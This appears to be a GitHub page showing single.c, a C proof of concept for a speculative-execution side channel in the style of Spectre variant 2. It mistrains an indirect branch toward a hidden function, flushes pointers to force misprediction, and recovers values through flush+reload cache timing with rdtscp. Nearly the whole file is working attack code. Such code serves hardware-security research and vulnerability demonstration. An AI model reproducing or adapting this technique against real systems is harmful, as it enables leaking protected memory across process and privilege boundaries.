-
Notifications
You must be signed in to change notification settings - Fork 4
/
single.c
161 lines (131 loc) · 4.39 KB
/
single.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <signal.h>
#include <x86intrin.h>
#include <unistd.h>
#include <string.h>
#include "common.h"
// Defines the bandwidth we can communicate
// from speculative -> von neuman
// e.g. 256 would be 1 byte of info
// Tradeoff here is larger bandwidth means we have
// to check more places in probe_buf (and flush them)
#define NUM_PROBES 256
// These define the stride length we take between probes
// This thwarts a clever CPU's stride prediction
// (e.g. "you loaded buf[0], buf[1024], I'll load buf[2048] for you")
// Generally, this results in not seeing ANY winning probes
// in which case, we change cur_probe_space and retry
#define MAX_PROBE_SPACE (1000003)
uint64_t cur_probe_space = 4177;
// The (heap-allocated) probe buffer
// We'll have NUM_PROBES in this, and use &probe_buf[i*cur_probe_space]
// in the cache to communicate the value i from speculative -> von neuman
uint8_t *probe_buf;
// This is a simple counter, accessed by the speculative function (target_fn)
// so it can compute on it.
uint8_t signal_idx = 0;
// Stats
uint64_t cache_hits = 0; // Number cache hits (<140 cycles read)
uint64_t tot_runs = 0; // Number of trials (i.e. 10k)
uint64_t tot_time = 0; // Number cycles total
unsigned int junk=0; // For rdtscp
// We define this function in assembly (target_fn.S)
// It is never called directly (essentially dead code)
// However, indirect.c trains the processor to think the indirect
// jump in common.c::indirect() is going to call this function
// We flush the fn_ptr used by indirect(), forcing the CPU to
// (mis)speculate and start processing this function.
// In reality, the CPU will (eventually) call check_probes()
// where we collect results and see what's in cache
void target_fn(void) __attribute__((section(".targetfn")));
void alias_target_fn(void) __attribute__((section(".aliastargetfn")));
void alias_target_fn(void) {
}
uint64_t results[NUM_PROBES];
void check_probes() {
uint64_t t0, t1;
uint8_t *addr;
int i;
for (i=0; i<NUM_PROBES; i++) {
addr = &probe_buf[i*cur_probe_space];
t0 = _rdtscp(&junk);
asm volatile( "movb (%%rbx), %%al\n"
:: "b"(addr) : "rax");
t1 = _rdtscp(&junk);
if (t1-t0 < 140) {
cache_hits++;
tot_time += t1-t0;
results[i]++;
//printf("# %lu\n", t1-t0);
//_mm_clflush(addr);
}
}
tot_runs++;
// Clear probe_buf from cache
for (i=0; i<NUM_PROBES; i++) {
_mm_clflush(&probe_buf[i*cur_probe_space]);
}
}
uint64_t jmp_ptr;
void measure() {
fn_ptr = check_probes;
alias_fn_ptr = alias_target_fn;
//jmp_ptr = 0x400e60;
jmp_ptr = 0;
int i, j;
while (1) {
for (i=0; i<1000; i++) {
for (j=0; j<100; j++) {
_mm_clflush(&alias_fn_ptr);
_mm_clflush(&fn_ptr);
_mm_clflush(&jmp_ptr);
if (j == 95) {
indirect(&jmp_ptr);
} else {
alias_indirect(&jmp_ptr);
}
}
}
uint64_t avg = 0;
if (cache_hits > 0) avg = tot_time/cache_hits;
uint64_t max_res=0, max_i=0;
for (i=0; i<NUM_PROBES; i++) {
if (results[i]>max_res) {
max_res = results[i];
max_i = i;
}
}
if (max_res > 10 && avg < 80){
printf("[%lu]: %lu / %lu = %0.5f%% hits, %lu avg cycles, ps %ld\n", max_i, max_res, tot_runs, 100*((float)max_res)/tot_runs, avg, cur_probe_space);
signal_idx++;
} else {
printf("--[%lu]: %lu, %lu avg cycles ps %ld\n", max_i, max_res, avg, cur_probe_space);
cur_probe_space += 63;
cur_probe_space %= MAX_PROBE_SPACE;
}
cache_hits = 0;
tot_runs = 0;
tot_time = 0;
memset(results, 0, sizeof(uint64_t)*NUM_PROBES);
signal_idx %= NUM_PROBES;
usleep(10);
}
}
int main()
{
probe_buf = malloc(MAX_PROBE_SPACE*NUM_PROBES);
if (probe_buf == NULL) {
perror("malloc");
return -1;
}
printf("probe_buf @%p\n", probe_buf);
int i =0;
for (i=0; i<NUM_PROBES; i++) {
memset(&probe_buf[i*MAX_PROBE_SPACE], i, MAX_PROBE_SPACE);
_mm_clflush(&probe_buf[i*cur_probe_space]);
}
fn_ptr = check_probes;
measure();
}